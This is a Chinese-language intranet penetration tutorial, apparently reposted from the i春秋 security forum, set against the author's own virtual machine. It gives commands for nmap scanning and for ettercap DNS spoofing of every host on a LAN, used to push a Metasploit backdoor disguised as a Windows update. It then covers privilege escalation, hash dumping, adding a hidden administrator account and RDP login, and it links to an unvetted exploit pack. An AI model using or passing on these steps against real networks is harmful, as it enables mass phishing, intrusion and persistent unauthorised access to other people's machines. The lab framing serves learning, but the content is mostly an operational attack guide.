本機(jī)ubuntu IP:192.168.0.3
虛擬機(jī)03主機(jī) IP:192.168.0.128
公司給了內(nèi)網(wǎng)ip怎么使用我們先來(lái)模擬一下 比如我拿到了我本機(jī)192.168.0.3 這臺(tái)服務(wù)器公司給了內(nèi)網(wǎng)ip怎么使用的管理權(quán)限后 我是如何繼續(xù)滲透192.168.0.128這臺(tái)主機(jī)的首先在內(nèi)網(wǎng)滲透中最常用的就是信息收集以及端口掃描說(shuō)起端口掃描和主機(jī)信息收集 大家不得不想到了nmap
nmap
nmap是一個(gè)網(wǎng)絡(luò)連接端掃描軟件,用來(lái)掃描網(wǎng)上電腦開放的網(wǎng)絡(luò)連接端。確定哪些服務(wù)運(yùn)行在哪些連接端,并且推斷計(jì)算機(jī)運(yùn)行哪個(gè)操作系統(tǒng)(這是亦稱 fingerprinting)。它是網(wǎng)絡(luò)管理員必用的軟件之一,以及用以評(píng)估網(wǎng)絡(luò)系統(tǒng)安全。
正如大多數(shù)被用于網(wǎng)絡(luò)安全的工具,nmap 也是不少黑客及駭客(又稱腳本小子)愛用的工具 。系統(tǒng)管理員可以利用nmap來(lái)探測(cè)工作環(huán)境中未經(jīng)批準(zhǔn)使用的服務(wù)器,但是黑客會(huì)利用nmap來(lái)搜集目標(biāo)電腦的網(wǎng)絡(luò)設(shè)定,從而計(jì)劃攻擊的方法。
Nmap 常被跟評(píng)估系統(tǒng)漏洞軟件Nessus 混為一談。Nmap 以隱秘的手法,避開闖入檢測(cè)系統(tǒng)的監(jiān)視,并盡可能不影響目標(biāo)系統(tǒng)的日常操作。
Nmap 在黑客帝國(guó)(The Matrix)中,連同SSH1的32位元循環(huán)冗余校驗(yàn)漏洞,被崔妮蒂用以入侵發(fā)電站的能源管理系統(tǒng)。
另外更多nmap相關(guān)信息 請(qǐng)到百度百科查看 太多 全搬過(guò)來(lái)的話 界面就不是特別美觀了https://baike.baidu.com/link?url=iKwQ4Q3iLG8zBo5mWA4z_GQ-vvFmqFjgi70x5PzDy0rn68KHQ5qyAZgdxv9Yf22aurOik7eAb2o2o_SYbGrKiq
我們用nmap的Intense scan模塊 來(lái)掃描 192.168.0.128 這臺(tái)主機(jī) 是在內(nèi)網(wǎng)中 掃描端口開放信息以及主機(jī)信息等一系列信息~ Intense scan 模塊可以滿足一般的掃描 如果你要掃描內(nèi)網(wǎng)主機(jī)的話 nmap 192.168.0.1/24 即可 192.168.0.1 是我的路由器地址
nmap -T4 -A -v 192.168.0.128
這里我們不得不說(shuō)一下 nmap確實(shí)很強(qiáng)大 下面為輸出結(jié)果
我們得知主機(jī)系統(tǒng)為 Windows2003 用戶組 版本信息 端口信息 開放了3389當(dāng)然 nmap有很多插件 可以掃描主機(jī)漏洞問題 那個(gè)我沒找到= =
咳咳配置Metasploit exe后門
ps:默認(rèn)端口4444
有的主機(jī)可以配合Metasploit溢出滲透xp 那樣直接獲取到一個(gè)cmd執(zhí)行權(quán)限 本臺(tái)主機(jī)我看了下 沒有遠(yuǎn)程溢出問題 補(bǔ)丁都打好了。
主機(jī)開放3389 后 而且是在內(nèi)網(wǎng) 那么我們dns欺騙 內(nèi)網(wǎng)全部主機(jī)的dns 我們寫一個(gè)html界面 提示你電腦存在xx漏洞 打補(bǔ)丁 后門改名字可以改為 Windows update.exe html界面越逼真越好。
ettercap -T -i wlp2s0 -q -P dns_spoof /// ///
下面為輸出結(jié)果參數(shù)問題:
-T文本模式 -i接要欺騙的適配器 -q安靜模式 -P dns_spoof調(diào)用這個(gè)插件 /// ///代表所有IP和子網(wǎng)掩碼
對(duì)方主機(jī)打開任何網(wǎng)站 都會(huì)成為我本機(jī)的index.html
Linux的 index.html在/var/www/html/目錄
直接gedit /var/www/html/index.html 即可編輯
首先你要先進(jìn)入root狀態(tài)
不然只能讀 不能寫
上面說(shuō)了 03主機(jī)是受害者 這里我假裝上當(dāng)了
打開了后門
這里我們的msf上線了
幫助信息
首先我們先來(lái)讀取下192.168.0.128這臺(tái)主機(jī)的hash數(shù)值
當(dāng)然 這些數(shù)值不好解密 咳咳
有提權(quán)exp 可以直接顯示hash值 解密后的
getsystem 獲取最高權(quán)限
shell 進(jìn)入cmd提權(quán)
我們成功獲取到了最高權(quán)限 進(jìn)入到了c盤 Windows system32的cmd.exe直接一條命令 即可添加用戶&管理員權(quán)限
net user xaisec xaisec /add & net localgroup administrators xaisec /add
連接192.168.0.128 這臺(tái)主機(jī) rdesktop
沒有rdesktop的 可以apt-get install rdesktop 安裝
rdesktop -h 參數(shù)
rdesktop 192.168.0.128 -u xaisec -p xaisec
-u 是用戶名的意思 -p是密碼
讀取解密哈希值
hash下
administrator admin
xaisec xaisec
使用administrator登錄
rdesktop 192.168.0.128 -u administrator -p admin
最后 我整理了下提權(quán)exp 有的沒有測(cè)試 不清楚有沒有后門自行檢查
鏈接: https://pan.baidu.com/s/1i56zH0T 密碼: qdhm
作者:小愛_Joker
來(lái)源:i春秋
鏈接:https://bbs.ichunqiu.com/thread-20514-1-1.html
煉石信息安全培訓(xùn)春季班開招
QQ:495066536
372806985
敬請(qǐng)持續(xù)關(guān)注……
評(píng)論列表
還沒有評(píng)論,快來(lái)說(shuō)點(diǎn)什么吧~